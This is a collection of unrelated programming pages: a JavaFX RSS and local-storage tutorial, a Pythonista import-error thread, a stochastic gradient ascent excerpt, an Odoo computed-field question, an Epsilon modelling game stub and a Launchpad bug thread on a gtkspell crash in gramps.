/usr/share/gramps/Spell.py:53: GtkWarning: gtk_text_buffer_get_bounds: assertion `GTK_IS_TEXT_BUFFER (buffer)' failed
  Spell(gtk.TextView()).set_language(lang)
https://bugs.launchpad.net/ubuntu/+source/gtkspell/+bug/120569
Related link:…

All this for pretty rich text editors; it doesn't seem worth it. I thought that the process would be as easy as:

- Choose one of two widely used AJAX frameworks
- Drop the right js file in the right directory
- Include it in my master template
- Write some js to render a rich-text editor component
- (maybe) write some onclick code that took care of populating the proper form field

In the end, it was a piece of cake, but getting to the solution took me hours.

The Contenders

I had anticipated that the scriptaculous or openrico people would've come up with some sort of rich text component by now, but I couldn't find a rich-text editor in either project. The app already had a dependency on the prototype library, so I googled "rich-text prototype library", but I couldn't find anything worth looking at. After some research, the two candidates I identified were Dojo and FCKeditor.

Dojo's site seemed slicker, the documentation appeared to be more professional, and the fact that Dojo is the foundation of Jot made me favor it over FCKeditor. I've used FCKeditor before; I knew it worked, but I had never integrated it with a server-side framework. From what I could see, Dojo would provide much more than just a rich-text editor: Dojo is a whole collection of components, code, and widgets. That's something I'm interested in, so….

Dojo Madness

I proceeded to select Dojo, downloaded the Kitchen Sink distribution, and quickly hit a brick wall. I tried to integrate the dojo.widget.Editor into my system, only to have the Firefox Javascript console tell me that the package couldn't be loaded by Dojo: dojo.require() was failing. I then tailed the access.log, only to see that dojo was trying to load the modules from the wrong path. Here's the central issue: in this particular application, the request path never maps to a real folder, and it appeared that the dojo library was attempting to find each package from a relative directory.
So, while I included the dojo.js by referencing /resources/js/dojo/dojo.js, the library was trying to reference the dojo src tree relative to the request path. So, if my page was /member/edit.do?id=29922, Dojo was trying to load dojo.widget.Editor from /member/edit/src/widget/Editor.js when it should be trying to load it from /resources/js/dojo/src/widget/Editor.js.

After some time screwing around with the dojo.js file, I stumbled on this piece of documentation: I can alter the path prefix that dojo uses to load a particular package with this syntax: setModulePrefix(modulePath, prefix). Great, so I played around with that for an hour, until I looked at the definition of this function in dojo.js. It is defined as setModulePrefix: function(module, prefix), and from what I could gather, the dojo documentation confused the order of the parameters. The documentation says dojo.setModulePrefix("src/", "dojo"); when it should be dojo.setModulePrefix("dojo", "src/");. Note: I'm ready for someone from DOJO to correct me if I'm mistaken, but it appears that the documentation is wrong.

I ended up setting the module prefix appropriately for "dojo", but after another few hours, I couldn't get the system to work properly because it couldn't locate other components. I then proceeded to dive into the dojo.js (uncompressed) so I could start the laborious process of printing debug statements with alert(). This is the tedious downside of the new AJAX reality. I tried to load this sucker up in Venkman, but it just wasn't cooperating. That's when I started to realize that dojo was trying to load an iframe and a Flash movie called storage.swf for every request. I also couldn't figure out how to change the path from which it expected to load this flash movie.
IMO, this was just too much magic for my taste; all I wanted was a rich-text editor, and now I've got Flash movies… I'm positive that other people have spent the time to get dojo working with Java, and I'd encourage them to post solutions to the comment area, but after losing five hours to Dojo, I decided that it was time to punt and go to FCKeditor.

FCKeditor

After my trial by Dojo, FCKeditor was a breath of fresh air. The 3-step installation process is a bit misleading, but getting the widget to render was a piece of cake. I could answer my own questions from the demo code, and I was up and running with a working FCKeditor + Struts form in no time. I used the code from html sample2 to replace the textarea, and then I used the code from html sample8 to call GetXHTML() on an instance of the Editor. So, to summarize: the form loads, FCKeditor replaces a textarea, then the onclick of the submit button populates that textarea with the XHTML from the FCKeditor.

Step-by-step Integration

- Download the FCKeditor distribution and unpack it somewhere in your webapp. I unpacked mine in "resources/FCKeditor".
- Include the fckeditor.js as a script in your page:

  <c:url
  <script type="text/javascript" src="${resDir}/FCKeditor/fckeditor.js"></script>

- Find a Struts form that already uses an html:textarea.
- To replace a textarea with an FCKeditor, here's the script:

  <c:url
  <script type="text/javascript">
  var oFCKeditor = new FCKeditor( 'notes' ) ;
  oFCKeditor.BasePath = "${fckEditorBase}" ;
  oFCKeditor.ToolbarSet = 'Basic' ;
  oFCKeditor.ReplaceTextarea() ;
  </script>

- Put the following code in the onclick of your submit button:

  var oEditor = FCKeditorAPI.GetInstance('notes');
  document.getElementsByName('notes')[0].value = oEditor.GetXHTML(true);

Conclusion

Please, if I'm missing something about the Dojo configuration, leave a comment. I'd prefer to use Dojo as a platform, and if someone has a solution to my absolute/relative path blues, please post it.
But, in the meantime, I’m very happy with the simplicity of the FCKeditor-based solution. I can drop the FCKeditor straight into my application without having to modify anything on the server-side. Nice timing Thanks so much for writing about this. These sort of things have always been on my "want" list for older apps, but I was going to have to use it for an upcoming app and was always fearful of that often multi-hour, multi-day frustration period of exploring different products. It's great that you condensed it into a short and easy to read introduction! Clarification From Tim: "I realized that the article above leaves out some details. Realize that the struts form in question has a textarea: <html:textarea. If I can grab a free hour from childcare, I'll throw a tarball together with a workign example." TinyMCE TinyMCE is another editor which is very configurable, easy to integrate, and has a very active community around it. my observations on Xinha Great post - I've been struggling with integrating a wysiwyg tool into my web app and have found it to be an immensely frustrating experience. I'm definitely going to check out FCK. I've been struggling with Xinha over the last week and am about to throw in the towel. I was initially quite impressed with it but I've had to deal with some absolutely ridiculous problems like corrupted html entities, mangled links, an indentation style that drives IE insane and a couple of other things. All of this has ruined the confidence of the customer and myself in the ability of this product to maintain the integrity of the data. To be fair, it does have a lot of good points, it generates good XHTML and the performance is good. Unfortunately, configuration can be quite a bear. The Xinha support forums are littered with people asking for help and not much help is forthcoming. Ah, that turned into a rant. Sorry about that. I'm sure Xinha is great for a lot of uses, just not mine. 
my observations on Xinha

Great post - I've been struggling with integrating a wysiwyg tool into my web app and have found it to be an immensely frustrating experience. I'm definitely going to check out FCK.

I've been struggling with Xinha over the last week and am about to throw in the towel. I was initially quite impressed with it, but I've had to deal with some absolutely ridiculous problems like corrupted html entities, mangled links, an indentation style that drives IE insane, and a couple of other things. All of this has ruined the confidence of the customer and myself in the ability of this product to maintain the integrity of the data.

To be fair, it does have a lot of good points: it generates good XHTML, and the performance is good. Unfortunately, configuration can be quite a bear. The Xinha support forums are littered with people asking for help, and not much help is forthcoming.

Ah, that turned into a rant. Sorry about that. I'm sure Xinha is great for a lot of uses, just not mine.
-Karl regarding Dojo Agreed, mailing lists would've been a good avenue for questions. But, I think that my experience is representative of the majority of developers who need to intergrate library X with library Y and have a finite amount of attention Blogging tended to get a good answer relatively quickly. :-) thanks for the response. Despite the initial difficulties, dojo seems to me at least to be a clearer, more comprehesive AJAX alternative. I'm rooting for dojo. #2 in your response, seems like that note needs to be higher up in the documentation - maybe even a note in the getting started guide. Anyway, what am I saying, I should just submit a patch. As for the possible type: grep setModulePath on regarding Dojo Well we still believe that if there is a question, the FAQ should be the first place you look. I think people ingeneral forget the purpose of them these days. They are (and this is my opinion on FAQs) there to serve as a buffer against repeatedly hearing/answering the same questions. As for better more... intuitive documentation, we have a front-end in the process to aide in building the API's and allowing for cleaner more complete documenation. Now, on to the unanswered portion of your reply, regarding setModulePrefix, I did a grep on dojo/src, and every function I see of dojo.setModulePrefix() has the exact same design as the API documenation you referenced from the manual. I think where the problem comes in is the names used for the arguments to the function. Which I fixed as of this reply. In the manual link that you posted, the API calls the 2 variables, "modulePrefix" and "prefix". However, the src code uses "module" and "prefix" respectively the same arguments, just slightly different name on the first one. I can see how this is confusing since the API oringally used "prefix" in both arguments. 
How the documentation is written "module" (formerly "modulePrefix" before being corrected to mirror the src code) is used to define the root directory of a developers own javascript module, and "prefix" is used to define the new namespace. As for your speed response, someone just happened to see this and tell me about it ;) You got lucky hehe. And just to give you some more food for thought. There is actually a wikiBook being worked on by myself and 1 other person that I'm aware of, that is meant to explain the basics of Dojo's features. However, instead of explaining the code behind a certain method (like programatic widget creation), we are focusing on the why you might choose to do it that way verus the parsed markup route and vice versa. Well, almost midnight and I still have a bit to do before bed. I hope this clears up your problem even further. It honestly looks like a misunderstanding from looking at the same code for too long ;) Good night, -Karl You should check out TinyMCE as well.. That problem has been hit by others, simply need to know how to create the path structure. If they had any kind of decent documentation, you and others wouldn't have this problem. If you look at their mailing list, people have been pleading with them for a long time for good documentation and tutorials. They resist doing this and can't get it through their head that their project will not get many users without it. Observation +2.5 months. I'm using FCKEditor at the present, but I'm still not entirely satisfied with the decision. FCKEditor requires a huge number of files, and I'm reconsidering Dojo. Dojo seems a cleaner soution than FCKEditor, and I'm having problems getting a FCKEditor to reload in a replaceable DIV. Hi, I had a hard time getting dojo o work, FCK was much easier. However I would like to use dojo editor because of its sleek look so any ideas on how to get it to work would be apperciated. I second iampivot. 
I would never touch neither one of your candidates since I tried TinyMCE. I have been looking into DOJO for the last 3 days and it seems really good, but I still havent looking into integrating DOJO with a back end server stuff. Thanks for this article it was good ..I just happend to read it. Just my two cents. I integrated dojo 0.4.1 into my springmvc backed application. The document wasn't much of help, but I manage to get the editor working by looking at their example and code, and added: var djConfig = { baseScriptUri: "", isDebug: false }; before anything. and it works. However, when I use the dialog widget to collect more adhoc info from the form. Very weird thing happened, and I still haven't got the chance to figure out why yet. Whatever I input in the dialog form element are not been submitted to the httpservletrequest object in my controller. And I am pretty sure this is dojo issue, because when i removed the widget, everything works fine. Anyway, I am moving to use fck for now, because of the internalization feature. TinyMce is great too. Thank you for this article. One thing i'm noticing is that "Karl's" post is not appearing (along with several after his) - the one with the explanation of the misunderstanding/fix to your article above. I just happened to see it when i did a 'view source' on this page because the comment starting with "regarding dojo" seemed to be missing some sentences (that i thought might have been code that didn't render properly). Thought you'd might want to get that fixed :) Thank you for point that out. I pasted part of the javascript code in there and that doesn't seem to be rendered properly. But a view source on page will do it. alert("It is not secure ...");
http://www.oreillynet.com/onjava/blog/2006/02/integrating_a_richtext_widget.html
crawl-002
refinedweb
2,677
63.09
I got a task to configure Facebook Authentication a couple of days back. I explored a couple of blog posts, like PointBridge and Osnapz; they are good posts and give you an idea of how to do it, but overall I didn't find anything like a step-by-step guide for users who are doing it for the first time. Also, when I started configuring Facebook Authentication I came across several issues that ate up a lot of time, and eventually my whole day was spent on it. Therefore, I thought I would make a blog entry that provides a step-by-step guide for configuring Facebook Authentication in SharePoint 2010.

Following are the steps to configure Facebook Authentication for SharePoint sites.

Step 1: Download and Install Components

- Download and install the Windows Identity Framework SDK from
- Download Json.Net from

Step 2: Create a new ASP.Net website

- Open Visual Studio and click on File > New Website.
- Specify the website name and the path to the folder where you want to store the website, and click OK.
- It will create a new website.
- Now associate a certificate with this website and enable SSL.
- Open IIS Manager by typing inetmgr in the Run option in Windows.
- Open Server Certificates and click on Create Self-Signed Certificate.
- Specify a certificate friendly name and click OK.
- The certificate will be created. Now associate this certificate with your website.
- Right-click on the server in IIS and click on Add Website. Specify the site name and physical path, select the port, and click OK. Your website will be hosted on IIS.
- Select the website and click on Bindings from the left panel.
- Click on Add, select the type 'https', and specify any port; by default it uses 443, but you can assign any other port as well. Select the certificate you just created and click OK.
- Now the server certificate has been associated with your website.
- Export this certificate and save it somewhere on your system. We will need it when running the PowerShell scripts.
- Now open Visual Studio and change the server settings in the Property Pages of the website.
- Right-click on your website and click on Property Pages.
- Go to the Startup Options, select the "Use custom server" option, and specify the website URL that is hosted on IIS (use the SSL one).
- Now navigate to your website and test it; it should be in working state and there should not be any issue.

Step 3: Create an STS Site from the ASP.Net website

- Go to Visual Studio, right-click on the website project, and click on Add STS Reference.
- It will pop up a wizard window; just click Next.
- In the next window select "Create a New STS Project in the current Solution".
- Click Finish.
- You will notice a new website has been added to the solution.
- Now open IIS Manager and change the physical path to the newly created STS website.
- Just click on the website in IIS Manager.
- Click on Basic Settings from the right panel in IIS Manager.
- Specify the new path and click OK.
- Now test your STS website; it should run without any issue.

Step 4: Create an Application in Facebook

- Navigate to
- Create a new application using the Create New Application option.
- Provide a name.
- Click OK. It will create a new application.
- Now click on Edit Settings and specify your ASP.Net site URL. We need to specify this so that Facebook redirects to default.aspx after successful authentication.
- Note the Application ID and Secret Key; we will reference them in the ASP.Net code.
- Now we are ready to move on to Step 5.

Step 5: Execute Scripts in PowerShell

Open the SharePoint 2010 Management Shell and execute the following scripts in order.
- $cert = New-Object System.Security.Cryptography.X509Certificates.X509Certificate2("c:\yourexported_cert.cer")
- $map1 = New-SPClaimTypeMapping "" -IncomingClaimTypeDisplayName "FacebookID" -SameAsIncoming
- $map2 = New-SPClaimTypeMapping -IncomingClaimType "" -IncomingClaimTypeDisplayName "Display Name" -LocalClaimType
- $realm = "urn:researchfacebook.com:facebook" (specify any URN, but note it down)

Step 6: Modify Code and Edit the Configuration File

1. Create a new oAuthFacebook.cs class and add it to the App_Code folder of the website project. The code of oAuthFacebook.cs follows; change the application ID and secret key to the values for your own application.

using System;
using System.Collections.Generic;
using System.Linq;
using System.Web;
using System.Net;
using System.Collections.Specialized;
using System.IO;

/// <summary>
/// Helper class for Facebook's OAuth authentication flow.
/// </summary>
public class oAuthFacebook
{
    public enum Method { GET, POST };

    public const string AUTHORIZE = "";      // Facebook authorize endpoint URL
    public const string ACCESS_TOKEN = "";   // Facebook access-token endpoint URL
    public const string CALLBACK_URL = "";   // your Login.aspx callback URL

    private string _consumerKey = "";
    private string _consumerSecret = "";
    private string _token = "";

    #region Properties
    public string ConsumerKey
    {
        get
        {
            if (_consumerKey.Length == 0)
            {
                // Your application ID
                _consumerKey = "000000000000000";
            }
            return _consumerKey;
        }
        set { _consumerKey = value; }
    }

    public string ConsumerSecret
    {
        get
        {
            if (_consumerSecret.Length == 0)
            {
                // Your application secret key
                _consumerSecret = "00000000000000000000000000000000";
            }
            return _consumerSecret;
        }
        set { _consumerSecret = value; }
    }

    public string Token
    {
        get { return _token; }
        set { _token = value; }
    }
    #endregion

    /// <summary>
    /// Build the link to Facebook's authorization page.
    /// </summary>
    /// <returns>The url with a valid request token, or a null string.</returns>
    public string AuthorizationLinkGet()
    {
        return string.Format("{0}?client_id={1}&redirect_uri={2}",
            AUTHORIZE, this.ConsumerKey, CALLBACK_URL);
    }

    /// <summary>
    /// Exchange the authorization code for an access token.
    /// </summary>
    /// <param name="authToken">The oauth_token or "code" supplied by Facebook's authorization page following the callback.</param>
    public void AccessTokenGet(string authToken)
    {
        this.Token = authToken;
        string accessTokenUrl = string.Format("{0}?client_id={1}&redirect_uri={2}&client_secret={3}&code={4}",
            ACCESS_TOKEN, this.ConsumerKey, CALLBACK_URL, this.ConsumerSecret, authToken);

        string response = WebRequest(Method.GET, accessTokenUrl, String.Empty);
        if (response.Length > 0)
        {
            // Store the returned access_token
            NameValueCollection qs = HttpUtility.ParseQueryString(response);
            if (qs["access_token"] != null)
            {
                this.Token = qs["access_token"];
            }
        }
    }

    /// <summary>
    /// Submit a web request.
    /// </summary>
    /// <param name="method">Http Method</param>
    /// <param name="url">Full url to the web resource</param>
    /// <param name="postData">Data to post in querystring format</param>
    /// <returns>The web server response.</returns>
    public string WebRequest(Method method, string url, string postData)
    {
        HttpWebRequest webRequest = null;
        StreamWriter requestWriter = null;
        string responseData = "";

        webRequest = System.Net.WebRequest.Create(url) as HttpWebRequest;
        webRequest.Method = method.ToString();
        webRequest.ServicePoint.Expect100Continue = false;
        webRequest.UserAgent = "[Your user agent]";
        webRequest.Timeout = 20000;

        if (method == Method.POST)
        {
            webRequest.ContentType = "application/x-www-form-urlencoded";
            // POST the data.
            requestWriter = new StreamWriter(webRequest.GetRequestStream());
            try
            {
                requestWriter.Write(postData);
            }
            finally
            {
                requestWriter.Close();
                requestWriter = null;
            }
        }

        responseData = WebResponseGet(webRequest);
        webRequest = null;
        return responseData;
    }

    /// <summary>
    /// Read the web server response.
    /// </summary>
    /// <param name="webRequest">The request object.</param>
    /// <returns>The response data.</returns>
    public string WebResponseGet(HttpWebRequest webRequest)
    {
        StreamReader responseReader = null;
        string responseData = "";
        try
        {
            responseReader = new StreamReader(webRequest.GetResponse().GetResponseStream());
            responseData = responseReader.ReadToEnd();
        }
        finally
        {
            if (responseReader != null)
            {
                // Closing the reader also closes the underlying response stream.
                responseReader.Close();
                responseReader = null;
            }
        }
        return responseData;
    }
}

2. In this step we will replace the existing logic in Login.aspx with the Facebook authentication logic.

3.
Open Login.aspx and replace its code-behind with the following code. The statements marked TODO are where the access token is used to request the user's profile JSON from Facebook.

using System;
using System.Web.Security;
using System.Web;
using System.Collections.Generic;
using Newtonsoft.Json;
using Newtonsoft.Json.Linq;

public partial class Login : System.Web.UI.Page
{
    protected void Page_Load(object sender, EventArgs e)
    {
        oAuthFacebook fbAuth = new oAuthFacebook();

        if (Request["code"] == null)
        {
            // No authorization code yet: send the user to Facebook's authorization page.
            Response.Redirect(fbAuth.AuthorizationLinkGet());
        }
        else
        {
            // Exchange the code for an access token.
            fbAuth.AccessTokenGet(Request["code"]);

            // TODO: use the access token to request the signed-in user's
            // profile JSON from Facebook and assign it to the variable below.
            string json = string.Empty;

            Dictionary<string, string> claims = GetClaims(json);
            HttpContext.Current.Session.Add("AuthClaims", claims);
            FormsAuthentication.SetAuthCookie("Facebook Test", false);
            Response.Redirect("default.aspx?" + HttpContext.Current.Session["OriginalQueryString"]);
        }
    }

    private Dictionary<string, string> GetClaims(string json)
    {
        Dictionary<string, string> claims = new Dictionary<string, string>();
        // TODO: parse the profile JSON (e.g. with Json.NET) and populate the
        // claims dictionary with the Facebook ID and display name.
        return claims;
    }
}

4. In CertificateUtil.cs I changed the logic from comparing the Subject Name to comparing the Friendly Name of the certificate. This is done because I have multiple self-signed certificates installed on my server, all with the same subject name (the machine name), so the only unique name I found was the Friendly Name. The comparison becomes (in outline):

if (cert.FriendlyName.ToLower() == subjectName.ToLower())
{
    if (result != null)
    {
        throw new ApplicationException(string.Format(
            "There are multiple certificates with the friendly name {0}", subjectName));
    }
    result = cert;
}

5. The GetScope method of CustomSecurityTokenService.cs looks like the following:

protected override Scope GetScope(IClaimsPrincipal principal, RequestSecurityToken request)
{
    ValidateAppliesTo(request.AppliesTo);

    //
    // Note: The signing certificate used by default has a Distinguished Name of "CN=STSTestCert",
    // and is located in the Personal certificate store of the Local Computer. Before going into production,
    // ensure that you change this certificate to a valid CA-issued certificate as appropriate.
    //
    Scope scope = new Scope(request.AppliesTo.Uri.OriginalString,
        SecurityTokenServiceConfiguration.SigningCredentials);
    scope.TokenEncryptionRequired = false;

    // Specify the realm name as defined in the PowerShell script.
    if (scope.AppliesToAddress == "urn:fbauth.com:facebook")
    {
        // Specify the URL of the web application that uses claims-based
        // authentication with Facebook as a trusted provider.
        scope.ReplyToAddress = "";
    }
    else
    {
        scope.ReplyToAddress = scope.AppliesToAddress;
    }
    return scope;
}

6. In the Web.config file, update the SigningCertificateName.

Step 7: Create a New Web Application in SharePoint 2010

- Open Central Administration and click Manage Web Applications.
- Select the New Web Application option from the ribbon.
- In the New Web Application window, select Claims Based Authentication as the authentication mode.
- Select Facebook as the trusted identity provider and click OK.
- Once the web application is created, we need to create a site collection: click Create Site Collections under Site Collections.
- Make sure your newly created web application is selected as the one for which you are creating the site collection.
- Specify a title and select any template. For the Primary Site Collection Administrator, click the Browse people/group button.
- The Select People window opens, and you will see Facebook in the left pane.
- Select Facebook and click the search icon; one Facebook user will be shown in the main pane.
- Select it and click OK.
- We are done; now we will navigate to our web application and log in with a Facebook account.

Step 8: Navigating to the SharePoint 2010 Site

- Navigate to your SharePoint site. It will show you the option to select the authentication type: Facebook or Windows Authentication.
- Select Facebook.
- As the certificate I used is self-signed, a warning will be shown; just click "Continue to this website" and proceed.
- The Facebook login page will be shown.
Enter your user name and password and click Sign In. The main SharePoint site home page will be shown.

Note: The first time you log in with your Facebook ID, SharePoint will show an Access Denied message together with the numeric ID of your Facebook account, saying that this ID does not have access to the site. Just copy that ID and add it to any of the SharePoint user groups of your site collection, or even specify it as a primary or secondary administrator just to test. When you then log in again, the main SharePoint site page will be shown.
Impressive coding, great work. Do we need to add a provider for Facebook in the web.config of the web application, so that Facebook users appear in the People Picker? I tried the same steps mentioned here but Facebook is not coming up in the People Picker.

Actually, we cannot add Facebook IDs directly to the SharePoint user groups to which we want to give access. Each Facebook ID has a numeric ID behind it; please see the "Note" section at the bottom of the blog for the problem I faced and then resolved. You can add that numeric ID to the SharePoint user group for permissions and access rights.

Exactly, that's what the problem is: my People Picker is not picking up the Facebook IDs. How do we configure the People Picker to get the Facebook users?

Hmm, good question, but as I got there the other way around, as mentioned in the post, I didn't look into it.

Great work, Ovais. I tried following the steps but got stuck at the creation of the STS reference, because I kept getting "File not found exception (0x80070002)". Any advice will be greatly appreciated. I am running on Windows Server 2008 R2.
Thanks. Raj

Great article. I followed the steps but I am stuck at one point: when we create the website in IIS, it cannot be browsed, or it gives me an error.

What error? Can you please share its details?

Hi, this is a really nice post; it helped me create a web application with Facebook as a trusted provider. But I am facing some difficulties. I am using SharePoint 2010 Foundation. In IIS I created the website, and in my ASP.NET code I created the STS website and made it the startup project; when I run the site it redirects directly to the Facebook login page. I then ran all the PowerShell commands and created the web application from Central Administration, also selecting Facebook as the trusted identity provider. But at the time of creating the site collection I am not able to find a "Facebook" Primary Site Collection Administrator.

See, when you log in for the first time with your Facebook ID it will give you an error message followed by a numeric ID. Just log in with Windows authentication and add that ID as the primary or secondary site collection administrator; by default, access is denied. Once done, log in again with your Facebook ID and you will pass through the authentication.

I have now created the site collection with "admin" as the primary site collection administrator, but when I choose to log in with Facebook it redirects me to Facebook's login page, which is what we want; after login, however, it does not show me any error message, and I jump directly to my Facebook account.

Hey, I found an error on the Default.aspx page: The action "" (Request.QueryString['wa']) is unexpected. Expected actions are: 'wsignin1.0' or 'wsignout1.0'. It occurs in the line of code referencing WSFederationConstants.Actions.SignOut, inside the catch (Exception exception) block. Can you please help me solve this?
You might be doing something wrong; please go through the article carefully. Many people have successfully implemented this by following the article without getting any such error. I can help you out, but please go through the article once again.

When I changed the physical path to the STS website's path and clicked Test Connection, I received a warning message saying "Cannot verify access to path". How can I solve this?

Hi, in Step 3 (Create an STS Site from the ASP.NET website), when I click Finish I get an exception saying: The system cannot find the file specified. (Exception from HRESULT: 0x80070002). I don't know what I can do to fix the problem. Can you please give us an update?

Thanks for the walk-through. I have no problem with the ASP.NET site with the STS integrated with Facebook, but when I configured Facebook authentication for SharePoint I received an error. Can you please tell me if there are some settings I have to change in SharePoint to resolve this error?

Was this resolved for you, Sri? I am in the same pool as you.

No! I was unable to find any solution for this issue.

Please check the article again; maybe you have missed a step. I didn't face any such error before.
It's not working; it's giving the error "Keyset does not exist" and a 500 Internal Server Error.

Please check where your website is hosted and provide a URL that is accessible; this is related to site-hosting issues.
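The access-granting flow discussed in the Note and in the comments can be summarized in a small Python sketch (the names and IDs are illustrative only, not SharePoint API calls): SharePoint resolves a Facebook login to its numeric ID claim and grants access only if that ID has been added to a site group or made an administrator.

```python
# Illustrative model of the first-login / access-denied workflow:
# the set stands in for the membership of a SharePoint site group.
allowed_ids = set()

def can_access(facebook_numeric_id):
    """Return True once the numeric Facebook ID has been added to a group."""
    return facebook_numeric_id in allowed_ids

# First login: access denied, but the error message reveals the numeric ID.
first_attempt = can_access("100001234567890")   # False

# An administrator adds the revealed numeric ID to a SharePoint group...
allowed_ids.add("100001234567890")

# ...and the second login succeeds.
second_attempt = can_access("100001234567890")  # True
```

This mirrors why the People Picker question above matters: until the numeric ID is placed in a group, every Facebook login is rejected.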
Add Ethernet to Any Arduino Project for Less Than $10

So you have a neat Arduino project going on. Wouldn't it be nice to add Internet connectivity, and do it on the cheap as well? This Instructable will show you how to add Internet connectivity in the form of an Ethernet interface for a few dollars and in less than half an hour.

Step 1: Order an ENC28J60 Ethernet Module on eBay

Apart from your Arduino, you need a ready-made Ethernet module. You can easily get these on eBay for as low as $10; just search eBay for "ENC28J60 module". In addition, you need a bit of electrical wire, a soldering iron, and some solder.

Step 2: Wire Up the Ethernet Module

Now it's time to wire up the module. Either use a connector to put on the Ethernet module header or solder straight onto the pins (like I did). You will need just six wires; I used about 3-4 inches of length, but this is not critical (as long as it's not a foot long).

Step 3: Arduino Code

The last step is to upload Arduino code to connect to the Internet. For the ENC28J60 chip/module, there are two Arduino libraries available: EtherShield (development has stopped) and EtherCard (the newest).
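The example sketch that follows serves a tiny web page showing the board's uptime, computed from millis() as hours, minutes, and seconds. As a quick sanity check, here is the same arithmetic transcribed to Python (for verification only; the real code runs on the Arduino):

```python
def uptime_hms(millis):
    """Mirror of the sketch's homePage() arithmetic: split a millisecond
    uptime into hours, minutes, and seconds."""
    t = millis // 1000      # long t = millis() / 1000;
    h = t // 3600           # word h = t / 3600;
    m = (t // 60) % 60      # byte m = (t / 60) % 60;
    s = t % 60              # byte s = t % 60;
    return "%02d:%02d:%02d" % (h, m, s)

print(uptime_hms(3_661_000))  # 1 h, 1 min, 1 s of uptime -> 01:01:01
```

The sketch emits each digit separately ($D$D:$D$D:$D$D with h/10, h%10, and so on), which is just the two-digit zero padding done by %02d here.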
Load a sketch that lets the Arduino act as a web server, like this example:

// This is a demo of the RBBB running as webserver with the Ether Card
// 2010-05-28 <jc@wippler.nl>

#include <EtherCard.h>

// ethernet interface mac address, must be unique on the LAN
static byte mymac[] = { 0x74,0x69,0x69,0x2D,0x30,0x31 };
static byte myip[] = { 192,168,1,203 };

byte Ethernet::buffer[500];
BufferFiller bfill;

void setup () {
  Serial.begin(57600);  // so the failure message below is visible
  if (ether.begin(sizeof Ethernet::buffer, mymac) == 0)
    Serial.println("Failed to access Ethernet controller");
  ether.staticSetup(myip);
}

static word homePage() {
  long t = millis() / 1000;
  word h = t / 3600;
  byte m = (t / 60) % 60;
  byte s = t % 60;
  bfill = ether.tcpOffset();
  bfill.emit_p(PSTR(
    "HTTP/1.0 200 OK\r\n"
    "Content-Type: text/html\r\n"
    "Pragma: no-cache\r\n"
    "\r\n"
    "<meta http-equiv='refresh' content='1'/>"
    "<title>RBBB server</title>"
    "<h1>$D$D:$D$D:$D$D</h1>"),
      h/10, h%10, m/10, m%10, s/10, s%10);
  return bfill.position();
}

void loop () {
  word len = ether.packetReceive();
  word pos = ether.packetLoop(len);
  if (pos)  // check if valid tcp data is received
    ether.httpServerReply(homePage());  // send web page data
}

With a bit of hacking, you can easily add code to display, for instance, analog values read off the analog pins.

Step 4: Done!!!

That's it: you just hooked up your Arduino to the Internet for less than $10.

62 Discussions

I want to cut a network cable halfway along and bridge it wirelessly. Can this module read the +RX, -RX, +TX, and -TX pins of the network port? Please share if you have experience with this.

I was expecting to see a level converter between the 5 V Arduino and the 3.3 V ENC28J60 board on the data lines; I've seen other DIY Arduino Ethernet boards that use one. But yours indicates that is not necessary? Thanks.

The vital pins are 5V tolerant, according to the datasheet.
SI is 3V3, which is recognised by 5V inputs.

2 years ago: The CS pin can be made to be 8 if you wish: ether.begin(sizeof Ethernet::buffer, mymac, 8) is all that is required. Great tutorial, though.

2 years ago: Hi all! A new UIPEthernet release is available (2.0.3). Added support for Intel ARC32, Nordic nRF51, and Teensy boards. Errata #12 corrected. Open issues corrected. Best regards.

2 years ago: Hi all! You can use the UIPEthernet library for ENC28J60 Arduinos (AVR, STM32F, ESP8266). Best regards.

Reply, 2 years ago: Hi all! New version available: 1.2.1. Added an abstract Print class to MBED for full compatibility (can use print, println with uIP objects). All examples working properly with the MBED compiler. Best regards.

2 years ago: Nice tutorial. Thanks, and for those with problems, ANSWER TO PROBLEM (Sep 2016): pin 10 for CS, NOT pin 8.

Reply, 2 years ago: Thanks, changing from pin 8 to 10 sorted out my issue... cheers!

3 years ago: Since the Ethernet module itself has some programmability, I can see it being an invaluable tool for a network technician. Maybe someone could write a snippet of code to blink the LEDs on a network switch in a user-defined pattern (just in case several were in use at once), a pattern different than normal network traffic (maybe blink the 10/100 LED). Then the tech could plug this into a network wall jack and find the blinking switch port; power it with three AA cells. Picture a building with 4 jacks per cubicle, 400 cubicles per floor, and 18 floors; now find the switch port for jack #3 in cubicle 307 on the 11th floor. Yes, a consistent wiring pattern can find the patch panel, but then there is the tangle of patch cords. I'd pay $50 for this in a heartbeat!
3 years ago: Does anybody know how to fix these errors while compiling? "...Arduino\libraries\ethercard-master\EtherCard.h:252:41: warning: 'prog_char' is deprecated [-Wdeprecated-declarations] void emit_raw_p (PGM_P p, uint16_t n) { memcpy_P(ptr, p, n); ptr += n; } ^" I get lots of those. Same thing when trying to use UIPEthernet.

3 years ago: I am using the UIPEthernet library; the connections are the same except for using Arduino pin 10 instead of 8.

3 years ago: Not working for me. I guess the wiring is correct because it works with the Ethercard library. The light is blinking, but I cannot ping it. Any ideas?

Reply, 3 years ago: Which library are you using, then? Ethercard is the only one that uses pin 8 (for CS). If you're using Ethernet or UIPEthernet, you will need to move it to pin 10.

4 years ago: Can this be used as a replacement for the Ethernet Shield?

Reply, 4 years ago: Yes indeed.

Reply, 3 years ago: Could I connect with just 4 wires? (I mean, I have a USB Ethernet adapter... is it possible to use it for this?)

Reply, 4 years ago: Thank you, you just helped me solve something.
https://www.instructables.com/id/Add-Ethernet-to-any-Arduino-project-for-less-than-/
open - open and possibly create a file or device

#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>

int open(const char *pathname, int flags);
int open(const char *pathname, int flags, mode_t mode);
int creat(const char *pathname, mode_t mode);

CONFORMING TO
SVr4, SVID, POSIX, X/OPEN, BSD 4.3. The O_NOFOLLOW and O_DIRECTORY flags are Linux-specific. One may have to define the _GNU_SOURCE macro to get their definitions.

SEE ALSO
read(2), write(2), fcntl(2), close(2), link(2), mknod(2), mount(2), stat(2), umask(2), unlink(2), socket(2), fopen(3), fifo(4)

64 pages link to open(2):
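A minimal usage sketch from Python, whose os module wraps these same open(2) flags (the file path here is arbitrary):

```python
import os
import tempfile

# open(path, O_WRONLY | O_CREAT | O_TRUNC, 0644): create or truncate for writing
path = os.path.join(tempfile.mkdtemp(), "demo.txt")
fd = os.open(path, os.O_WRONLY | os.O_CREAT | os.O_TRUNC, 0o644)
try:
    os.write(fd, b"hello\n")
finally:
    os.close(fd)

# Reopen with O_RDONLY and read the contents back
fd = os.open(path, os.O_RDONLY)
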